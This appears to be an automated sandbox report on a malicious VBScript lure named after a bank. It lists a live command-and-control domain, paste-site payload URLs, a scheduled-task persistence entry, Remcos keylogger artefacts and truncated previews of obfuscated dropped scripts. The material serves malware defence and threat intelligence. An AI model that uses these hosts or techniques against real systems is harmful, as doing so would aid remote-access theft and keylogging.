                        rem.pushswroller.eu | true | Avira URL Cloud: malware | unknown
                        https://paste.rs/LDDIb | true | Avira URL Cloud: safe | unknown
                        Name | Source | Malicious | Antivirus Detection | Reputation
                        http://geoplugin.net/json.gp/C | aspnet_compiler.exe, 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | | high
                        https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs | wscript.exe, 0000000E.00000003.2512795164.00000230DF5DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2479709616.00000230DD815000.00000004.00000020.00020000.00000000.sdmp, BBVA S.A..vbs, haematachometer.vbs.11.dr | false | | high
                        https://paste.rs/ | wscript.exe, 0000000E.00000002.2537637767.00000230DF710000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
                        https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs_ | wscript.exe, 00000000.00000003.2138819495.0000014C48B91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2480120754.00000230DF561000.00000004.00000020.00020000.00000000.sdmp | false | | high
                        http://geoplugin.net/json.gpR | aspnet_compiler.exe, 0000000F.00000002.2892055901.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp | false | | high
                        https://github.com/koswald/VBScriptf | wscript.exe, 00000000.00000003.2139271062.0000014C48BA7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2138790827.0000014C48B97000.00000004.00000020.00020000.00000000.sdmp | false | | high
                        https://github.com/koswald/VBScript | haematachometer.vbs.11.dr | false | | high
                        https://paste.rs/LDDIb8 | wscript.exe, 0000000E.00000002.2529422593.00000230DD806000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2525028654.00000230DD806000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2520710436.00000230DD7DD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                        https://paste.rs/LDDIbs | wscript.exe, 00000000.00000003.2174559674.0000014C46D2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2176015156.0000014C46D8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2176807263.0000014C46D8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2175053685.0000014C46D64000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2523814289.00000230DD840000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2526469472.00000230DD840000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.2529538333.00000230DD840000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                        https://paste.rs/LDDIbt; | wscript.exe, 0000000E.00000003.2521837843.00000230DF710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.2537637767.00000230DF710000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                        https://github.com/koswald/VBScript/blob/master/SetupPerUser.md | wscript.exe, 00000000.00000003.2172256961.0000014C48C08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2138399784.0000014C48BBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2138503358.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139016682.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2138734913.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2176246896.0000014C48C0F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2174559674.0000014C46D2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2173911891.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139136981.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139348876.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139195389.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2172680874.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2172776501.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2172464026.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2172626663.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2175053685.0000014C46DA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2175277697.0000014C48CA1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2138837387.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2174349568.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139271062.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2175798890.0000014C46DA6000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
45.80.158.30 | rem.pushswroller.eu | Netherlands | 13213 | UK2NET-ASGB | true
45.63.94.214 | paste.rs | United States | 20473 | AS-CHOOPAUS | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
104.21.84.67 | paste.ee | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1576754
Start date and time: 2024-12-17 14:29:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 51s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: BBVA S.A..vbs
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winVBS@19/12@5/4
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 11
• Number of non-executed functions: 205
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
• Excluded IPs from analysis (whitelisted): 104.17.202.1, 104.17.201.1, 20.190.177.146, 20.103.156.88, 13.107.246.63, 2.16.158.80, 4.245.163.56, 173.222.162.64
• Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, resc.cloudinary.com.cdn.cloudflare.net, ctldl.windowsupdate.com, tse1.mm.bing.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target aspnet_compiler.exe, PID 7924 because there are no executed function
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: BBVA S.A..vbs
Time | Type | Description
08:30:07 | API Interceptor | 150x Sleep call for process: powershell.exe modified
08:31:10 | API Interceptor | 12x Sleep call for process: aspnet_compiler.exe modified
14:30:36 | Task Scheduler | Run new task: TaskName path: wscript.exe s>C:\ProgramData\haematachometer.vbs
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
45.80.158.30 | 173261064444feee4c05378d5cb0bdc1a536ff9f623e28d93246c641e622bd865a85d1a223699.dat-decoded.exe | malicious | Snake Keylogger, VIP Keylogger | sws.swpushroller.eu/swsk/P4.php
45.80.158.30 | Doc261124.vbs | malicious | Snake Keylogger, VIP Keylogger | sws.swpushroller.eu/swsk/P4.php
45.63.94.214 | nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta | malicious | Cobalt Strike, Remcos |
45.63.94.214 | invoice09850.xls | malicious | Remcos |
45.63.94.214 | Invoice A037.xls | malicious | Unknown |
178.237.33.50 | Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | givenbestupdatedoingformebestthingswithgreatnewsformegive.hta | malicious | Cobalt Strike, Remcos | geoplugin.net/json.gp
178.237.33.50 | clearentirethingwithbestnoticetheeverythinggooodfrome.hta | malicious | Cobalt Strike, Remcos | geoplugin.net/json.gp
178.237.33.50 | 7Sbq4gMMlp.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | PO_0099822111ORDER.js | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | requests-pdf.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Documents.pdf | malicious | Remcos, DBatLoader | geoplugin.net/json.gp
178.237.33.50 | x295IO8kqM.exe | malicious | Remcos | geoplugin.net/json.gp
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context
rem.pushswroller.eu | 173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exe | malicious | Remcos | 45.80.158.30
rem.pushswroller.eu | Aktarma,pdf.vbs | malicious | Remcos | 45.80.158.30
paste.ee | greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta | malicious | Cobalt Strike, Remcos | 172.67.187.200
paste.ee | seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta | malicious | Cobalt Strike, Remcos | 104.21.84.67
paste.ee | sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta | malicious | Cobalt Strike, Remcos | 172.67.187.200
paste.ee | createdbetterthingswithgreatnressgivenmebackwithnice.hta | malicious | Cobalt Strike, FormBook | 104.21.84.67
paste.ee | givenbestupdatedoingformebestthingswithgreatnewsformegive.hta | malicious | Cobalt Strike, Remcos | 104.21.84.67
paste.ee | clearentirethingwithbestnoticetheeverythinggooodfrome.hta | malicious | Cobalt Strike, Remcos | 172.67.187.200
paste.ee | PO_0099822111ORDER.js | malicious | Remcos | 104.21.84.67
paste.ee | NB PO-104105107108.xls | malicious | Unknown | 188.114.96.6
paste.ee | greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta | malicious | Cobalt Strike, Remcos | 104.21.84.67
paste.ee | goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta | malicious | Cobalt Strike, FormBook | 172.67.187.200
paste.rs | nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta | malicious | Cobalt Strike, Remcos | 45.63.94.214
paste.rs | invoice09850.xls | malicious | Remcos | 45.63.94.214
paste.rs | Invoice A037.xls | malicious | Unknown | 45.63.94.214
geoplugin.net | Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | givenbestupdatedoingformebestthingswithgreatnewsformegive.hta | malicious | Cobalt Strike, Remcos | 178.237.33.50
geoplugin.net | clearentirethingwithbestnoticetheeverythinggooodfrome.hta | malicious | Cobalt Strike, Remcos | 178.237.33.50
geoplugin.net | 7Sbq4gMMlp.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | PO_0099822111ORDER.js | malicious | Remcos | 178.237.33.50
geoplugin.net | requests-pdf.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | Documents.pdf | malicious | Remcos, DBatLoader | 178.237.33.50
geoplugin.net | x295IO8kqM.exe | malicious | Remcos | 178.237.33.50
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context
AS-CHOOPAUS | hpEAJnNwCB.exe | malicious | LummaC | 45.77.249.79
AS-CHOOPAUS | DG55Gu1yGM.exe | malicious | LummaC | 45.77.249.79
AS-CHOOPAUS | SkaKk8Z1J0.exe | malicious | LummaC | 45.77.249.79
AS-CHOOPAUS | file.exe | malicious | LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig | 45.77.249.79
AS-CHOOPAUS | Setup.exe (1).zip | malicious | Unknown | 209.222.21.115
AS-CHOOPAUS | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | 45.77.249.79
AS-CHOOPAUS | mips.elf | malicious | Unknown | 149.248.45.75
AS-CHOOPAUS | bot.spc.elf | malicious | Mirai | 45.32.181.8
AS-CHOOPAUS | rebirth.mpsl.elf | malicious | Mirai, Okiru | 108.61.131.209
AS-CHOOPAUS | Setup.msi | malicious | Unknown | 45.77.249.79
ATOM86-ASATOM86NL | Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | givenbestupdatedoingformebestthingswithgreatnewsformegive.hta | malicious | Cobalt Strike, Remcos | 178.237.33.50
ATOM86-ASATOM86NL | clearentirethingwithbestnoticetheeverythinggooodfrome.hta | malicious | Cobalt Strike, Remcos | 178.237.33.50
ATOM86-ASATOM86NL | 7Sbq4gMMlp.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | PO_0099822111ORDER.js | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | requests-pdf.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | Documents.pdf | malicious | Remcos, DBatLoader | 178.237.33.50
ATOM86-ASATOM86NL | x295IO8kqM.exe | malicious | Remcos | 178.237.33.50
UK2NET-ASGB | 173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exe | malicious | Remcos | 45.80.158.30
UK2NET-ASGB | Aktarma,pdf.vbs | malicious | Remcos | 45.80.158.30
UK2NET-ASGB | main_m68k.elf | malicious | Mirai | 77.92.90.50
UK2NET-ASGB | la.bot.mips.elf | malicious | Unknown | 88.202.185.180
UK2NET-ASGB | la.bot.m68k.elf | malicious | Unknown | 46.28.54.10
UK2NET-ASGB | 173261064444feee4c05378d5cb0bdc1a536ff9f623e28d93246c641e622bd865a85d1a223699.dat-decoded.exe | malicious | Snake Keylogger, VIP Keylogger | 45.80.158.30
UK2NET-ASGB | Doc261124.vbs | malicious | Snake Keylogger, VIP Keylogger | 45.80.158.30
UK2NET-ASGB | loligang.x86.elf | malicious | Mirai | 80.209.188.4
UK2NET-ASGB | ajbKFgQ0Fl.exe | malicious | Unknown | 45.80.158.23
UK2NET-ASGB | 8UUxoKYpTx.elf | malicious | Mirai | 173.244.199.148
CLOUDFLARENETUS | https://disruptivc-dot-yamm-track.appspot.com/Redirect?ukey=1-0q8XPD2_exH3GZm9N9GPlcuW7DeTrX4WZWK6ta6DkQ-0&key=YAMMID-76523483&link=https://construction-sealants-ltd.jimdosite.com | malicious | HTMLPhisher | 162.159.128.70
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Xmrig | 104.21.23.76
CLOUDFLARENETUS | https://www.picotech.com/download/software/sr/PicoScope6_r6_14_69.exe | malicious | Unknown | 104.20.22.157
CLOUDFLARENETUS | https://jotform-mailing.com/ | malicious | Unknown | 104.21.64.1
CLOUDFLARENETUS | ugpJX5h56S.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 172.67.177.134
CLOUDFLARENETUS | itLDZwgFNE.exe | malicious | Flesh Stealer | 104.16.184.241
CLOUDFLARENETUS | 87h216Snb7.exe | malicious | GuLoader, Snake Keylogger | 104.21.67.152
CLOUDFLARENETUS | https://sos-at-vie-1.exo.io/ilbuck/sato/process/continue-after-check-vr2.html | malicious | CAPTCHA Scam ClickFix | 104.17.25.14
CLOUDFLARENETUS | https://www.cadbury.com@nmlr.xyz/christmas-hamper | malicious | Unknown | 104.26.9.83
CLOUDFLARENETUS | Doc_23-03-27.js | malicious | Unknown | 104.21.32.1
Match (JA3 fingerprint) | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | ugpJX5h56S.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.84.67
3b5074b1b5d032e5620f69f9f700ff0e | 87h216Snb7.exe | malicious | GuLoader, Snake Keylogger | 104.21.84.67
3b5074b1b5d032e5620f69f9f700ff0e | 174 Power Global_Enrollment_.docx.doc | malicious | Unknown | 104.21.84.67
3b5074b1b5d032e5620f69f9f700ff0e | mjjt5kTb4o.lnk | malicious | Unknown | 104.21.84.67
3b5074b1b5d032e5620f69f9f700ff0e | 122046760.bat | malicious | RHADAMANTHYS | 104.21.84.67
3b5074b1b5d032e5620f69f9f700ff0e | pkqLAMAv96.lnk | malicious | RHADAMANTHYS | 104.21.84.67
3b5074b1b5d032e5620f69f9f700ff0e | IIC0XbKFjS.lnk | malicious | RHADAMANTHYS | 104.21.84.67
3b5074b1b5d032e5620f69f9f700ff0e | 873406390.bat | malicious | RHADAMANTHYS | 104.21.84.67
3b5074b1b5d032e5620f69f9f700ff0e | 0J3fAc6cHO.lnk | malicious | RHADAMANTHYS | 104.21.84.67
3b5074b1b5d032e5620f69f9f700ff0e | uEhN67huiV.dll | malicious | Unknown | 104.21.84.67
37f463bf4616ecd445d4a1937da06e19 | ugpJX5h56S.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 45.63.94.214
37f463bf4616ecd445d4a1937da06e19 | 87h216Snb7.exe | malicious | GuLoader, Snake Keylogger | 45.63.94.214
37f463bf4616ecd445d4a1937da06e19 | dP5z8RpEyQ.exe | malicious | GuLoader, MassLogger RAT | 45.63.94.214
37f463bf4616ecd445d4a1937da06e19 | hpEAJnNwCB.exe | malicious | LummaC | 45.63.94.214
37f463bf4616ecd445d4a1937da06e19 | Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk | malicious | Unknown | 45.63.94.214
37f463bf4616ecd445d4a1937da06e19 | sEOELQpFOB.lnk | malicious | RedLine | 45.63.94.214
37f463bf4616ecd445d4a1937da06e19 | ref095vq842r70_classement_atout_france.pdf.lnk.d.lnk | malicious | RedLine, SectopRAT | 45.63.94.214
37f463bf4616ecd445d4a1937da06e19 | PAYMENT ADVICE TT07180016-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 45.63.94.214
37f463bf4616ecd445d4a1937da06e19 | bxAoaISZJQ.lnk | malicious | Unknown | 45.63.94.214
37f463bf4616ecd445d4a1937da06e19 | ei0woJS3Dy.lnk | malicious | Unknown | 45.63.94.214
                                                        No context
Process: C:\Windows\System32\cmd.exe
File Type: Unicode text, UTF-16, little-endian text, with very long lines (475), with CRLF line terminators
Category: dropped
Size (bytes): 171308
Entropy (8bit): 3.447397726048375
Encrypted: false
SSDEEP: 1536:groJZFpjN3Z5cpeYTXOnBodK/fI81ltCwKoAVTmT2xc1k3TjSjjXuw7dk+aojwE3:grorj9Z5ccYKKIIyScjXx7dk+aojD
MD5: 3C217B6A70E1FF5E6ECB71CA0E89644A
SHA1: D158BCEE429368797C22F4C2F9A305C2FF37BEAE
SHA-256: 4E66FDBC38893F545B9088331861312E46E612BC9F4F96A9C88B286588680BF9
SHA-512: 38BB4918E229BB83C0F7F4F3CA086253F22197F44887F81DBE4AAD019811B91799BC9206155C99906855372CDC0EB09F778913D8D2B59423C3B5E550585672DB
Malicious: true
Preview: ..D.i.m. .s.h. .'.W.S.c.r.i.p.t...S.h.e.l.l. .o.b.j.e.c.t.....D.i.m. .f.s.o. .'.S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.....D.i.m. .f.o.r.m.a.t. .'.S.t.r.i.n.g.F.o.r.m.a.t.t.e.r. .o.b.j.e.c.t.....D.i.m. .s.u.i.t.e.F.o.l.d.e.r. .'.s.t.r.i.n.g.:. .f.o.l.d.e.r. .w.h.e.r.e. .t.e.s.t. .s.u.i.t.e. .s.c.r.i.p.t.s. .a.r.e. .l.o.c.a.t.e.d.....D.i.m. .p.r.o.j.e.c.t.F.o.l.d.e.r. .'.s.t.r.i.n.g.:. .r.o.o.t. .f.o.l.d.e.r. .f.o.r. .t.h.i.s. .p.r.o.j.e.c.t.....D.i.m. .s.u.i.t.e.F.i.l.t.e.r. .'.s.t.r.i.n.g.:. .f.i.l.e.n.a.m.e. .f.i.l.t.e.r. .f.o.r. .s.e.l.e.c.t.i.n.g. .i.n.t.e.g.r.a.t.i.o.n. .t.e.s.t. .s.u.i.t.e.s.......D.i.m. .c.a.p.t.i.o.n. .'.s.t.r.i.n.g.:. .M.s.g.B.o.x./.P.o.p.U.p. .t.i.t.l.e. .b.a.r. .t.e.x.t.......D.i.m. .a.D.o.c.G.e.n.s. .'.a.r.r.a.y. .o.f. .s.t.r.i.n.g.s.:. .f.i.l.e.s.p.e.c.s. .f.o.r. .c.o.d.e.-.c.o.m.m.e.n.t.-.b.a.s.e.d. .d.o.c.u.m.e.n.t.a.t.i.o.n. .g.e.n.e.r.a.t.o.r.s.......D.i.m. .a.G.i.t.s. .'.a.r.r.a.y. .o.f. .s.t.r.i.n.g.s.:. .c.o.m.m.o.n. .f.i.l.e.s.p.e.c.s.

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type: data
Category: dropped
Size (bytes): 144
Entropy (8bit): 3.38816599775145
Encrypted: false
SSDEEP: 3:rhlKlyKJltWlPclfU5JWRal2Jl+7R0DAlBG45klovDl6v:6lZJlklPUfU5YcIeeDAlOWAv
MD5: 01CDC853E2D3F97B6886ACBE2DDF9EB2
SHA1: EDE374396CC3D369BD9BC2FBA2F869D3F843668A
SHA-256: 7D4CD0B5A0B6D86C25EA63AF6DAF4ABCAB58A43AC01786B27BF5728740931179
SHA-512: D5C6A30F3914CD2675021D438B55ED77D2C0AF09503DBBAEAA7018B9ADBB38136766459634E6E8D47BCB8E8338636EA9A7048836CAF48072C528670A2A8BDDA2
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Preview: ....[.2.0.2.4./.1.2./.1.7. .0.8.:.3.0.:.3.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

Process: C:\Windows\System32\wscript.exe
File Type: Unicode text, UTF-8 text, with very long lines (3445), with CRLF line terminators
Category: dropped
Size (bytes): 79269
Entropy (8bit): 5.541228121600052
Encrypted: false
SSDEEP: 1536:Od+rLwb323bD0Xq5SXz8eRgd+rLwb323bD0Xq5SXz8ekd+rLwb323bD0Xq5SXz89:OdoLU323bDi2SXz8eRgdoLU323bDi2S1
MD5: EA91E5A559CF86C5CC019ABC9F4BD827
SHA1: C4D9D354CDE9689DA348B6DB214B35A1C1A807BF
SHA-256: A1DC46E1455ACF53BE3A11104D1930152A3B223AAC8A520DA0A6A4E370842308
SHA-512: 0603463B0FCDAEEDE0F600D098D2BA7A99ED1D446F6B9476558575CCA5DA18A9808F4FE1420831B831D5BC4ADC6152D5AD5B697E7C33CECBBEC00D27BF2C4A10
Malicious: false
Preview: .. ..UvLgSGeNCcpxAdJ = "LxBfLbmGZgRPzbK"..UPhAcmLLibkKGZq = "WdCILckrOWZWQZN"..WKcAJNtWAeOGjCa = "hkPIUzbrWZKkcPp"....oexBKoGpcJNhPWf = "UgKcLuShGOKRLdW"..eKkeGitKmPcGGKq = "kpWmKUcxSkLLWWP"..ZmAcKoGiSiULiKz = "ZpcTALLmLcLsLcc"..UWfhtLKWUUgoPqz = "bTpkdCGiiKNmBaU"..zhGoUWpQaiKGjPk = "NWiNHLdpKqaZoAu"..ceWzaLmkGipLKBi = "qLaWiSQZLBeKfiK"..aunkLTutZinmRUn = "LKJbSUkGoBRccuk"..cUNLHvHLbroohHB = "iWZoiqWOxmiKLhW"..tTinsTGLtURtcBf = "KapGpWGRUzofccW"..ALUOLbaKWpcKuhk = "ccLqLKiWppTflct"..AuGmoRicLqUqiWG = "fcucCbLojmKpUWW"..LiCGiLKWxinAUzd = "cLhGHLTdanWfkzd"....zKZNoUcUmUZQPWr = "WWOKLaTGNLmgRcb"..ditpecAnWALOpBm = "kQKuWeLtLlpNKNc"..KLWJoKNiWAKNZNS = "IbKIbbqLkUhWTxZ"..WZdchzWcLWZZlNO = "kpGxcOPohLLkAfz"..ohKhLicPRazZiGz = "NUZbtKkacGoooft"..LUWcceLNOAZUaAp = "oGWcKpuCUcKPxWU"..KSNmKWpPiqkgmWG = "NTPlqLGeRzcPdzv"..LjmKWcqLxkGkqWG = "LoKZctGzAlgWLca"..nsrUmqcbxNWLaLu = "ZtncWzhzKoiLABU"....UUeiokiRZUGarxd = "oHKcABNRiUGKaPR"..eLAKGpNqGgkxKAe = "kZLftUuCccKOIsk"..SLzLsCGfriudPbn = "AACZo

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type: JSON data
Category: dropped
Size (bytes): 963
Entropy (8bit): 5.018384957371898
Encrypted: false
SSDEEP: 12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zz2:qlupdRNuKyGX85jvXhNlT3/7CcVKWro
                                                        MD5:C9BB4D5FD5C8A01D20EBF8334B62AE54
                                                        SHA1:D38895F4CBB44CB10B6512A19034F14A2FC40359
                                                        SHA-256:767218EC255B7E851971A77B773C0ECC59DC0B179ECA46ABCC29047EEE6216AA
                                                        SHA-512:2D412433053610C0229FB3B73A26C8FB684F0A4AB03A53D0533FDC52D4E9882C25037015ACE7D4A411214AA9FAA780A8D950A83B57B200A877E26D7890977157
                                                        Malicious:false
                                                        Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                        Process:C:\Windows\System32\wscript.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (3445), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):79269
                                                        Entropy (8bit):5.541228121600052
                                                        Encrypted:false
                                                        SSDEEP:1536:Od+rLwb323bD0Xq5SXz8eRgd+rLwb323bD0Xq5SXz8ekd+rLwb323bD0Xq5SXz89:OdoLU323bDi2SXz8eRgdoLU323bDi2S1
                                                        MD5:EA91E5A559CF86C5CC019ABC9F4BD827
                                                        SHA1:C4D9D354CDE9689DA348B6DB214B35A1C1A807BF
                                                        SHA-256:A1DC46E1455ACF53BE3A11104D1930152A3B223AAC8A520DA0A6A4E370842308
                                                        SHA-512:0603463B0FCDAEEDE0F600D098D2BA7A99ED1D446F6B9476558575CCA5DA18A9808F4FE1420831B831D5BC4ADC6152D5AD5B697E7C33CECBBEC00D27BF2C4A10
                                                        Malicious:false
